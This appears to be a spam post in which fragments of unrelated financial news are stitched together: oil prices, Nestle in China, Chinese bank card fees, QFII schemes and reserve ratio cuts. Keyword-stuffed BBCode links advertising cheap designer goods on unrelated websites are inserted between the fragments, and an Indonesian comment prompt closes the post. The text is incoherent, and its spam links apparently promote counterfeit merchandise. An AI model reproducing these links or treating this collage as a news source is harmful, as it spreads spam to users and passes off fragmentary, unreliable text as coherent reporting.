    Benchmark U.S. oil gained 3 cents to settle at US$92.12 a barrel. It rose as high as US$92.85 in the morning after gains in European stocks. But then the price dipped after the US government reported a bigger-than-expected increase in US crude supplies. [url=http://www.francoischouchan.fr/smenu.asp?escarpins-louboutin-pas-cher/]escarpins louboutin pas cher[/url] Strategically, we would view the deal positively since it would give Nestle access to China’s fast-growth US$6 billion confectionery market and allow the group a number of international cross-selling opportunities, MF Global analysts, including Andy Smith, wrote in a research note. [url=http://www.hotel-auvergne-saintroch.com/conn.asp?hollister-soldes/]hollister soldes[/url] CHINA yesterday started to reduce bank card fees for retail merchants, saving them over US$1 billion, a move Chinese central bank said will benefit retailers and consumers but hit banks’ intermediate business. [url=http://www.judithhartjewellers.co.uk/uploadedimages/small.asp?fitflop-sale/]fitflop sale[/url] Launched in 2002, the QFII program is now the main gateway for foreign investors to invest directly in China’s securities markets. The RQFII scheme, dubbed the “mini QFII,” was introduced at the end of 2011 to offer overseas investors a channel to invest in mainland stock markets with offshore yuan.

    The taxes are imposed on the rich people, and should rather be raised than reduced, Liu said. “Besides, stronger reliance on imported goods may damp competitiveness of domestic companies.” [url=http://www.ricochetcreative.co.uk/uploadedimages/large.asp?mulberry-outlet-store-online/]mulberry outlet store online[/url] Zhou suggested the People’s Bank of China would have to rely on cutting the reserve requirement ratio going forward, with a 50-basic-point reserve ratio cut possible, and a 100-basic-point cut not surprising.

Silahkan Berikan Tanggapan Anda...